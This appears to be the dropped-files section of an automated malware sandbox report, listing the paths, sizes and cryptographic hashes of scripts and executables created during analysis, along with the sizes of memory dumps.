Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Temp\53d50e90-9250-43bd-866d-a879cc7c0057.vbs

Filesize
715B

MD5
e6c8ccc48c771894e86de83e293c2eb6

SHA1
30a93d1e9c32a92d47b231a0bb61f840aececf39

SHA256
bf4d38e0ed80305a1f22553545d8c33d75d6aaae7d26787ca7eb91c32df434cb

SHA512
76cba42484e3d55922c2742efb690a35dbadb7615a6d3eb582ae4dede39c51d55fae35a61360b5e24af06559e80ff772439ce1559b03bb706c820e14c8f78f2e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4pcyw5zh.agf.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\b4fd42aa-1667-4647-83fa-91b27908354c.vbs

Filesize
492B

MD5
2426b6923716898751309bac5134ab93

SHA1
b40d9829dcbe86042efabcb2b57f055f4b306f0f

SHA256
e832abf14c8963b0f31b9e11447595bb1a7120f0878dbaae66538f95a2646b8b

SHA512
e43a3f5fecc877832fc371bd213aaa0519e102c0591258f78b54c9e01dd2a5747e35f65e39b383a3b3fd587349d04d0a601da031dcd76499635fdf4693e90ec6

Download Submit
C:\Users\Admin\AppData\Local\Temp\k7obWzcPp6.bat

Filesize
205B

MD5
c5024b00aad6773e7b4b7774693d097e

SHA1
6a7840a0849db04f8e0f23376ddee602b0049539

SHA256
be8067a82f5d37db86bae6f3ebd2b57ef0da69eae7831522876d2895f2b9ab44

SHA512
4abaaa25a55cb23a75e53fbe51b62eb74fb3b8443226b8f05db57b4e465765215c8e19aa38103e11f666b2a7cacbce663468b2d9caca81f27c3eb29720fe7428

Download Submit
C:\Windows\debug\DebugTracker.exe

Filesize
942KB

MD5
22cbb5402a44f058c9176e04aa74b5f6

SHA1
10838c4611974ba2a5382442677dcf679840ecdd

SHA256
5d1930426e5e41548bcc214c4298c96028ea71d2a83f755e50fa5756c35a615a

SHA512
10d0693f4c6ff9cbcdf5b4ec8b0c690f11d9463c834c94fc7659bf9a89edae9c0b951e55f5909344caf4cccc1ea8d7635b58126cb3667847a290b4f0ac49f0a0

Download Submit
C:\Windows\debug\PXm40rAQJNL1dLLc2xrFc0EDNV.bat

Filesize
35B

MD5
159dec09c9bf063b00e4952d8665a601

SHA1
38bac5d19ebd3822e23b07932cd65ba7c2c08a9c

SHA256
f380d068932fe95e35273007cae8acc6d71bd62446c7fa7f0ed0da6bcb7b0c9c

SHA512
5cb79038ee2f712aead2b6180af25305326044711d9f8270b4075eabe7635c096eb8c4e22182633d639abf29293d28a7187d5c8bb5726cd6a9707b48961df073

Download Submit
C:\Windows\debug\VUQLBafFd1oU7p3k.vbe

Filesize
217B

MD5
f9ed37928a0d95692faa9f69d0cd5cb7

SHA1
77c2968f3d2ba8afb128307105861734b4fce286

SHA256
61ac997d454ae62b6025b60e2ac9f1c7031cf380f3d9d1395de3cd816d35554a

SHA512
cbe7954def42abac38dde5ba9f9fbc341e8e9161a9b0826e9fe779541fdf2b0057402d9c3dab608a9b01dc9c3229a122e13ac71bd52be978adbd628d16867b79

Download Submit
C:\Windows\debug\cs2.exe

Filesize
137KB

MD5
509f2eeba11a964fa8d22ab6994cee78

SHA1
544321089bbc1cbc6e51eabcfcb0c042f797142c

SHA256
21c7ecd4074b68a2d59b6b241037392a0f1ee2d6450fa3c72a3895f3563d5a2a

SHA512
f6eed65466977ef5b775e9dd1c204790b901e64bebc648e71b38062dd5d9207cc53fbfa4bf7b170dfc1fa41bfb1570cb6527863d9abe5d03efc49eedc5487cf0

Download Submit
C:\Windows\debug\wtf.exe

Filesize
265KB

MD5
47ba0b9187c62981c229372477e2b2a0

SHA1
9c861ee21eb30ec6aa35b02bd437f70c2ac25eee

SHA256
93a0a5f1d487c699ba0809428c732bb0d741bc41b4459490b24d9b03ee3183fc

SHA512
2a65a3b52751ce99918ab3e01db1cc21e08e5a5069fd0256a6601a3aee5d2d75ce842c9eeb147cd7d76612b0ab8f86adee2eab3fea8e410f55c8061a690585c7

Download Submit
C:\Windows\debug\wtf1.exe

Filesize
229KB

MD5
187795687849f43176bc94aff323435f

SHA1
22e3d510df771291a2a256946ac6268ccf5d10be

SHA256
d7ebf40f863050be539cd8cbba2463c48235aa509819ed3b066a1c0b4974203e

SHA512
b099c9cbd3f5d9cd44dae19c66e88d32e5c290fa3f8cd6818397b54f2f73d318738d96b295053254bed4f254a2ebdfb2a8e75402e61314343060447888d781a3

Download Submit
memory/916-68-0x000001A99CBC0000-0x000001A99CC06000-memory.dmp

Filesize
280KB

Download
memory/1128-158-0x0000000000D10000-0x0000000000E02000-memory.dmp

Filesize
968KB

Download
memory/1128-160-0x0000000003040000-0x000000000304E000-memory.dmp

Filesize
56KB

Download
memory/1128-159-0x0000000003030000-0x000000000303A000-memory.dmp

Filesize
40KB

Download
memory/1128-161-0x0000000003050000-0x0000000003058000-memory.dmp

Filesize
32KB

Download
memory/1952-67-0x00000256F5D70000-0x00000256F5D98000-memory.dmp

Filesize
160KB

Download
memory/2200-133-0x000001E2EA6B0000-0x000001E2EA6BA000-memory.dmp

Filesize
40KB

Download
memory/2200-134-0x000001E2EA7F0000-0x000001E2EA802000-memory.dmp

Filesize
72KB

Download
memory/2200-96-0x000001E2EA6C0000-0x000001E2EA6DE000-memory.dmp

Filesize
120KB

Download
memory/2200-95-0x000001E2EA6F0000-0x000001E2EA740000-memory.dmp

Filesize
320KB

Download
memory/2200-94-0x000001E2EA770000-0x000001E2EA7E6000-memory.dmp

Filesize
472KB

Download
memory/2200-53-0x000001E2E7FF0000-0x000001E2E8030000-memory.dmp

Filesize
256KB

Download
memory/2888-74-0x0000019AE78A0000-0x0000019AE78C2000-memory.dmp

Filesize
136KB

Download